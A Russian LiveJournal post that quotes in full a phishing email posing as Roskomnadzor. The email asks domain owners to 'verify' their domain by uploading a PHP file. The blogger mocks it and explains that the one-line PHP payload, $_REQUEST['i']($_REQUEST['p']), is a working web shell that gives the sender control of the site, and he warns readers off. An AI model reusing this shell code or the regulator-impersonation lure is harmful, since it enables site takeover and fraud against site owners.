Inetman (inetman) wrote,
Inetman
inetman

Category:
  • Mood:

Вирусня шагает по планете! На костылях.

"— Здравствуйте, я афганский вирус. По причине ужасной бедности моего создателя и низкого уровня развития технологий в нашей стране я не способен причинить какой-либо вред Вашему компьютеру. Поэтому очень прошу Вас, пожалуйста, сами сотрите какой-нибудь важный для Вас файл,а потом разошлите меня по почте другим адресатам. Заранее благодарю за понимание и сотрудничество."

Думаю, сетевеки со стажем помнят этот анекдот, разве что страна могла в нём меняться от Белоруссии до Заира. Я над ним тоже похихикал в своё время, а сегодня вспомнил внезапно. Потому что мне пришла вот такая вот прелесть:



Цитрую полностью, поисковикам на радость:

"Уважаемый администратор домена!

В соответствии с изменениями, внесенными в Федеральный закон "Об информации, информационных технологиях и о защите информации" от 27.07.2006 N 149-ФЗ, необходимо подтвердить, что фактическое управление доменом *********.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл y84vj86quce00t6.php со следующим содержимым:

<?php
print("KKJUGRPGH");
$_REQUEST['i']($_REQUEST['p']); ?>

Файл должен быть создан в течение трех рабочих дней с момента получения данного сообщения и находиться на сервере до 10 мая 2021 года, 22:00 (UTC+03:00), в противном случае процедура верификации будет считаться непройденной.

Сообщаем Вам о том, что если процедура верификации не будет пройдена, делегирование домена будет приостановлено.

Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций

Вы получили это письмо, потому что подписались на получение уведомлений.
Вы можете отписаться от рассылки уведомлений в личном кабинете."


Первая реакция: ВАУ! У меня есть личный кабинет в РосКомНадзоре!
Вторая: Ыыыыыы.... Смешно-то как!
Третья: блин, а ведь есть люди, которые на это могут повестись. Для тех, кто не знает PHP: этот код позволяет выполнить на сайте практически любую функцию, да ещё и с параметром. То есть по сути даёт полный контроль над сайтом, а если права доступа настроены криво, то и над сервером. Так что... Не ведитесь. Хотя откуда вы такие тут возьмётесь, у меня в ЖЖшечке... Ну да вдруг вам повезёт найти этот пост.

P.S. Что интересно, сервак, с которого приехало письмо, принадлежит каким-то воронежским сайтописателям. Представляю, какие секьюрные сайты они делают =)))
Tags: it, идиотизмы, работа
Subscribe

  • Почти месяц прошёл и ага...

    Пока иные переезжают за океаны, катают по городам и весям и всячески по-иному проводят весело время, я начало лета как-то не особо отметил. Впрочем,…

  • Галопом по лытдыбру

    Отмечали в воскресенье день рождения друга. Наутро даже кошка посмотрела на меня красными сонными глазами и впервые в жизни не вскочила сначала…

  • У ЖыЖыста нет цели, только поток сознания

    "Каждый из нас приходит в этот мир со своими надеждами и чаяниями. Мы надеемся на многое — в том числе на то, что к цели нас приведёт кратчайший…

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 1 comment